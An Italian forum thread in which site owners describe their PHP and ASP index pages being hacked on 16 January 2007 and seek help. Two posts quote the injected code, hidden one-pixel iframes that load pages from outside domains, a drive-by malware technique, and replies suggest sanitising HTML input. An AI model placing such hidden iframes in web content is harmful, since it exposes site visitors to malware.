Aiuto oscuramento portale

[infonet]

Salve

cerco iuto per questo motivo :

Gestisco nel mio piccolo un portale con 4 servizi in php come Annunci Gratuiti - Forum - Directory - Galleria Fotografica ma questa mattina vado a vedere e vedo che le pagine non si vedevano più . Controllando nell header di tutti i servizi in particolare nelle index vedo questo codice

<iframe src="http://www.abetterstart.com/c/2261/counter21.php" width=1 height=1 style="display:none"></iframe>
<iframe src="http://yepjnddqpq.biz/dl/adv647.php" width=1 height=1 style="display:none"></iframe><iframe src="http://www.abetterstart.com/c/2261/counter21.php" width=1 height=1 style="display:none"></iframe>
<iframe src="http://yepjnddqpq.biz/dl/adv647.php" width=1 height=1 style="display:none"></iframe>com

come posso evitare questo inconveniente .

Grazie

[Nunkij]

Come ci è finito quel codice là? E' preso da un database del tuo sito (quindi qualche utente malintenzionato ce l'ha inserito?). Se la risposta è sì ricordati di eliminare tutti i caratteri che possono essere interpretati come codice HTML una volta stampati a video. Principalmente < e >. Ovviamente rimuovi le righe del database che contengono quelle parti di codice.

[infonet]

ma nel data base sql

[Nunkij]

Come?

[piero.mac]

vedi se puo' esserti di aiuto questa discussione

http://www.hak5.org/forums/viewtopic...cc2627d69fdf97

[Fritzlo]

Io ho trovato nella mia pagina del codice malevolo, ma non ho la più pallida idea come ci sia finito... Vi posto il codice, sinceramente è affine ai problemi che dicevate, ma sono sconcertato da come sia potuto finirci dato che è in una pagina asp, ma non ho visualizzazioni da db e per di più il testo risulta inserito direttamente nella pagina...

Codice PHP:

<iframe src="http://www.abetterstart.com/c/2261/counter21.php" width=1 height=1 style="display:none"></iframe><iframe src="http://yepjnddqpq.biz/dl/adv647.php" width=1 height=1 style="display:none"></iframe> 


Codice PHP:

<iframe src="http://xepxaxmxsu.biz/dl/adv647.php" width=1 height=1 style="display:none"></iframe> 


Inoltre ho visto che la data di modifica della pagina corrisponde alle ore 1.06 del 16/01/2007, più o meno nello stesso momento dell'altro post... Se qualcuno ne sa di più...

Saluti

Federico

[infonet]

anche a me il 16/1

[Fritzlo]

Ma avevi trovato il codice nei file?!?

Ma non ti è sembrato strano che qualcuno avesse accesso al file per modificarlo?
Dove l'hai hostato?
Che tipo di server è?

Ciao

[infonet]

aruba - LINUX

MI HA MODIFICATO TUTTE LE INDEX

[Fritzlo]

A me solo quella di default... anche a me aruba, ma su server windows...

Speriamo sia stato un "problema" momentaneo...